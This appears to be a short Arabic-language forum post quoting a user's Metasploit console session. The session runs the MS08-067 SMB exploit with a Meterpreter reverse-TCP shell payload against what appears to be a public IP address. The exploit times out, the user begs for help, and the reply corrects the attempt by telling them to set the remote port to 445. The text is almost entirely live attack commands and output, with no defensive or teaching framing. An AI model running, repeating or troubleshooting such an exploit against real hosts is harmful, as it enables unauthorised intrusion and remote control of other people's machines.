عدد النقاط : 10
اقتباس المشاركة الأصلية كتبت بواسطة halouf msf exploit(ms08_067_netapi) > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set lhost 192.168.2.1 lhost => 192.168.2.1 msf exploit(ms08_067_netapi) > set RHOST 41.228.72.143 RHOST => 41.228.72.143 msf exploit(ms08_067_netapi) > set RPORT 4444 RPORT => 4444 msf exploit(ms08_067_netapi) > exploit [-] Handler failed to bind to 192.168.2.1:4444[*] Started reverse handler on 0.0.0.0:4444 [-] Exploit failed: The connection timed out (41.228.72.143:4444).[*] Exploit completed, but no session was created Plz Help Meeeee set rport 445